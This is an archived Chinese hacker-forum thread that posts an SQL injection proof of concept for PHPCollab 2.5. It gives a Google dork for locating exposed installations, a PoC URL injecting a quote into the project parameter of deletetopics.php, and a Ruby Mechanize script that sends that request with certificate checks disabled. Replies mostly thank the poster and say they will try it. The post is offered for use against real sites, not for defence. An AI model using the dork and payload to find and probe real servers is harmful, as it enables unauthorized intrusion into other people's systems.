PHPCollab 2.5注入漏洞

90_ 发表于 2015-5-15 11:03:41

Google Dork: filetype:php inurl:"/general/login.php?PHPSESSID="

###################################################################################
PoC = http://127.0.0.1/phpcollab/topics/deletetopics.php?project=%27
###################################################################################
#=====================================================
require('mechanize')
agent = Mechanize.new()
agent.redirect_ok = false
agent.verify_mode = OpenSSL::SSL::VERIFY_NONE
#=====================================================
begin
html = agent.get("http://127.0.0.1/phpcollab/topics/deletetopics.php?project=%27")
rescue
else
puts(html.body())
end
#=====================================================

cuckocucko 发表于 2015-5-15 13:02:33

能不能解释一下代码。

乐生乐道 发表于 2015-5-15 15:23:32

:)拿走试试，感谢楼主

q1076468651 发表于 2015-5-16 07:58:51

新手路过

小路发表于 2015-6-27 00:12:48

还是不错的哦，顶了

HUC-参谋长 发表于 2015-6-27 02:30:41

支持中国红客联盟(ihonker.org)

wilist 发表于 2015-6-27 02:35:54

加油！干倒冰儿和酒仙！

Jack-5 发表于 2015-6-27 03:33:05

加油！干倒冰儿和酒仙！

cl476874045 发表于 2015-6-28 02:37:35

支持中国红客联盟(ihonker.org)

r00tc4 发表于 2015-6-29 17:26:09

感谢楼主的分享~

页: [1]

红客联盟 - 由08安全团队运营's Archiver

PHPCollab 2.5注入漏洞